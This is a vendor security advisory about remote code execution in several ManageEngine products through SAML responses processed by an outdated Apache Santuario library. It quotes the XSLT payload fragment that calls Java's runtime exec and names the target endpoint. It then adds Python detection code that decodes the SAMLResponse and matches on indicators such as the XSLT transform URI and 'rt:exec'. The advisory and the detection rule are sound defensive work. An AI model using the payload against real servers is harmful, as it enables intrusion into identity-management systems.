Application Details
The following 5 ManageEngine applications are affected: Access Manager Plus v4307, Active Directory 360 v4309, ADAudit Plus v7080, ADManager Plus v7161, and ADSelfService Plus v6210.
Vulnerability
Multiple ManageEngine products could allow a remote attacker to execute arbitrary code on the system, caused by the usage of an outdated third party dependency, Apache Santuario.
Identification
If SAML single sign-on is currently enabled or has previously been enabled, an attacker could send a SAML request with an invalid signature to execute arbitrary code on the system:
-----snipped-----
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,'uid')"/>
<xsl:variable name="processString" select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
-----snipped-----
This request is base64 encoded:
POST /SamlResponseServlet
PAYLOAD -
SAMLResponse=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
-----snipped-----
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
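The detection described above works on the decoded SAML message rather than on the raw POST body, because the base64 wrapping shifts the byte alignment of any substring and a plain pattern on the encoded form would miss it. The following is an added illustration of that matching logic, written for this page and not part of Idappcom's signature or traffic file: it parses a raw HTTP request, base64-decodes the SAMLResponse parameter sent to /SamlResponseServlet, and flags the indicators a SAML signature should never carry (the XSLT transform algorithm URI from XML-DSig, xsl elements, and the Java runtime calls shown in the snippet). Both sample requests, the host name, and the indicator list are constructed for the example.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlencode

# Standard XML-DSig identifier for an XSLT transform (constructed indicator list,
# not the vendor's rule). A legitimate SAML signature uses c14n transforms only.
XSLT_TRANSFORM_URI = "http://www.w3.org/TR/1999/REC-xslt-19991116"
INDICATORS = (
    XSLT_TRANSFORM_URI,
    "<xsl:stylesheet",
    "<xsl:template",
    "getRuntime",
    "rt:exec",
    "ProcessBuilder",
)


def decode_saml_response(body: str) -> str:
    """Return the decoded SAMLResponse XML from a form-encoded POST body, or ''."""
    params = parse_qs(body, keep_blank_values=True)
    encoded = params.get("SAMLResponse", [""])[0]
    padded = encoded + "=" * (-len(encoded) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(padded)
    except (ValueError, binascii.Error):
        return ""
    return raw.decode("utf-8", errors="replace")


def inspect_request(raw_request: str) -> dict:
    """Inspect one raw HTTP request; match only POSTs to the SAML response endpoint."""
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    method, path = (parts + ["", ""])[:2]
    hits = []
    if method == "POST" and path.split("?")[0].endswith("/SamlResponseServlet"):
        xml = decode_saml_response(body)
        hits = [ind for ind in INDICATORS if ind in xml]
    return {"path": path, "matched": bool(hits), "indicators": hits}


def build_post(path: str, saml_xml: str) -> str:
    """Constructed helper: wrap XML the way a browser POST binding would."""
    body = urlencode({"SAMLResponse": base64.b64encode(saml_xml.encode()).decode()})
    return (
        f"POST {path} HTTP/1.1\r\nHost: idp.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


# Constructed sample: an ordinary signed response using an exclusive-c14n transform.
BENIGN_XML = (
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
    '<ds:Reference><ds:Transforms><ds:Transform Algorithm='
    '"http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms></ds:Reference>'
    '</ds:SignedInfo></ds:Signature></samlp:Response>'
)

# Constructed sample: the same envelope carrying the XSLT fragment quoted on this page.
SUSPICIOUS_XML = (
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
    '<ds:Reference><ds:Transforms><ds:Transform Algorithm='
    '"http://www.w3.org/TR/1999/REC-xslt-19991116">'
    '<xsl:template match="/">'
    '<xsl:variable name="rtobject" select="rt:getRuntime()"/>'
    '<xsl:variable name="process" select="rt:exec($rtobject,\'uid\')"/>'
    '</xsl:template></ds:Transform></ds:Transforms></ds:Reference>'
    '</ds:SignedInfo></ds:Signature></samlp:Response>'
)

if __name__ == "__main__":
    for label, xml in (("benign", BENIGN_XML), ("suspicious", SUSPICIOUS_XML)):
        print(label, inspect_request(build_post("/SamlResponseServlet", xml)))
```

The XSLT transform URI is the strongest single indicator, since no legitimate SAML signature chain includes an XSLT step; the element and method names back it up when the decoded body is truncated or when a sensor only sees part of the message.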
Coverage
Idappcom have created signature 8023499 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional